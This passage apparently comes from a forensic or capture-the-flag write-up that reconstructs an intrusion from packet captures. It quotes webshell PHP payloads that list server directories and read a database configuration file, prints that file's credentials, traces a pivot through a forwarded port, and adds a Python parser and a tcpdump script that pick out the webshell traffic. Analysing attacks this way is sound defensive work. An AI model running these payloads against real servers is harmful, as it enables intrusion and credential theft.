@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/include/
ERROR:// Path Not Found Or No Permission!
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/caches/
caches_admin/ 2017-09-03 03:37:50 4096 0777
caches_content/ 2017-09-03 03:37:50 4096 0777
poster_js/ 2017-09-03 03:37:50 4096 0777
bakup/ 2017-09-03 03:37:50 4096 0777
caches_commons/ 2017-09-03 03:37:50 4096 0777
caches_tpl_data/ 2017-09-03 03:37:50 4096 0777
caches_linkage/ 2017-09-03 03:37:50 4096 0777
caches_model/ 2017-09-03 03:37:50 4096 0777
./ 2017-09-03 03:45:14 4096 0777
vote_js/ 2017-09-03 03:37:50 4096 0777
caches_search/ 2017-09-03 03:38:33 4096 0755
caches_scan/ 2017-09-03 03:37:50 4096 0777
caches_member/ 2017-09-03 03:37:50 4096 0777
sessions/ 2017-09-03 03:37:50 4096 0777
../ 2017-09-03 03:38:34 4096 0777
configs/ 2017-09-03 03:37:50 4096 0777
caches_template/ 2017-09-03 03:45:14 4096 0777
install.lock 2017-09-03 03:38:34 0 0644
error_log.php 2017-09-05 02:54:12 769 0644
index.html 2017-09-03 03:31:45 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/caches/configs/
./ 2017-09-03 03:37:50 4096 0777
../ 2017-09-03 03:45:14 4096 0777
ku6server.php 2017-09-03 03:31:45 208 0777
sub_config.php 2017-09-03 03:31:45 1376 0777
route.php 2017-09-03 03:31:45 803 0777
credit.php 2017-09-03 03:31:45 122 0777
cache.php 2017-09-03 03:31:45 330 0777
database.php 2017-09-03 03:38:32 324 0777
model_config.php 2017-09-03 03:31:45 52 0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php 2017-09-03 03:31:45 781 0777
snda.php 2017-09-03 03:31:45 51 0777
system.php 2017-09-05 00:11:58 2430 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// read the contents of the file /var/www/html/caches/configs/database.php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// read the contents of the file /var/www/html/caches/configs/database.php
<?php
return array (
'default' => array (
'hostname' => 'localhost',
'port' => 3306,
'database' => 'phpcmsv9',
'username' => 'root',
'password' => '123456',
'tablepre' => 'v9_',
'charset' => 'gbk',
'type' => 'mysqli',
'debug' => true,
'pconnect' => 0,
'autoconnect' => 0
),
);
?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/include/
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// list all files in the directory /var/www/html/
The attacker's approach and the attack flow are now clear:
First, the attacker (172.16.10.110) obtained a webshell on a reachable Windows host, 192.168.20.117 (DedeCMS).
Then, using lcx, port 80 (phpcms) of the internal host 192.168.20.88 was forwarded to port 8888 on 172.16.10.110.
From there a further vulnerability was exploited to gain control of the internal host.
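The timeline reconstructed by hand above (which directory was listed, which file was read, which command was run, and in which direction the forwarded traffic flowed) can be pulled out of the tcpdump text mechanically. The script below is an added example, not part of the original writeup: it walks `tcpdump -A` output such as http.txt, recognises the X@Y-delimited webshell payloads by the three request shapes seen in this capture, and emits one timestamped event per request and reply. The sample input is constructed from the packet line and payload formats quoted in this writeup, and the parser assumes the payloads appear decoded as they do here (form bodies are URL-decoded first).

```python
import re
from urllib.parse import unquote_plus

# Packet summary line that `tcpdump -A` prints before every payload.
PKT_RE = re.compile(r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
                    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags")
# The three request shapes the capture shows: directory listing, file read, shell command.
ACTION_RES = (
    ("list_dir", re.compile(r"\$D='([^']*)';\$F=@opendir\(\$D\)")),
    ("read_file", re.compile(r"\$F=['\"]([^'\"]*)['\"];\$(?:P|fp)=@fopen\(\$F,'r'\)")),
    ("exec", re.compile(r"\$s='([^']*)';.*proc_open", re.S)),
)
MARKER = "X@Y"  # delimiter the shell echoes around every result

def classify_payload(body):
    """Map one TCP segment's text to (kind, argument), or None if it is unrelated traffic."""
    body = unquote_plus(body)  # request bodies are form-encoded on the wire
    if "@eval($_POST[" in body:
        return "dropper", None  # the one-line shell itself (seen when it is uploaded or read back)
    if MARKER not in body:
        return None
    for kind, rx in ACTION_RES:
        m = rx.search(body)
        if m:
            return kind, m.group(1)
    # Anything else carrying the marker is a reply from the shell.
    return ("response", None) if re.search(r"^HTTP/\d\.\d \d{3}", body, re.M) else None

def parse_tcpdump_text(text):
    """Walk `tcpdump -A` output and build a timeline of webshell requests and replies."""
    events, hdr, body = [], None, []
    def flush():
        res = classify_payload("\n".join(body)) if hdr else None
        if res:
            events.append({"ts": hdr["ts"], "src": f"{hdr['src']}:{hdr['sport']}",
                           "dst": f"{hdr['dst']}:{hdr['dport']}", "kind": res[0], "arg": res[1]})
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            flush()                      # a new packet header closes the previous segment
            hdr, body = m.groupdict(), []
        else:
            body.append(line)
    flush()
    return events

# Constructed sample of `tcpdump -A` text in the shape the writeup quotes (not the real capture).
SAMPLE = "\n".join([
    "17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1:598, ack 1, win 64240, length 597",
    "E..}.k@...St..",
    "POST /uploadfile/2017/0905/20170905055411283.php HTTP/1.1",
    "t=echo(\"X@Y\");$D='/var/www/html/caches/';$F=@opendir($D);echo $M.$L;echo(\"X@Y\");die();",
    "17:54:03.201000 IP 192.168.20.117.1409 > 172.16.10.110.8888: Flags [P.], seq 1:120, ack 598, win 63472, length 119",
    "HTTP/1.1 200 OK",
    "X@Yconfigs/\t2017-09-03 03:37:50\t4096\t0777\nX@Y",
    "18:01:09.000000 IP 172.16.10.110.8888 > 192.168.20.117.1430: Flags [P.], seq 1:500, ack 1, win 64240, length 499",
    "POST /uploadfile/2017/0905/20170905055411283.php HTTP/1.1",
    "t=echo(\"X@Y\");$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$fp=proc_open($r,$a,$pipes);echo(\"X@Y\");die();",
])
```

Running `parse_tcpdump_text` over the real http.txt gives the same sequence as the manual annotations above, and the src/dst pairs show the forwarded flow (requests leaving 172.16.10.110:8888, replies from the pivot host's ephemeral ports).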
At this point the HTTP-level part of the challenge should be mostly analysed; once we have the actual questions we should be able to fill in the answers directly.
This challenge also provides FTP logs,
so it should also involve the FTP protocol.
#!/bin/bash
# ftp.sh: extract every packet to or from the two hosts named in the FTP log from each pcap
target_folder='ftp'
mkdir -p "${target_folder}"
for file in *.pcap; do
    echo "Dumping ftp packets in ${file}..."
    tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r "$file" -w "${target_folder}/${file}"
    echo "${file} Done!"
done
Although there are FTP packets, the IPs from the log don't seem to appear in them.
Maybe my copy of the packet captures is incomplete?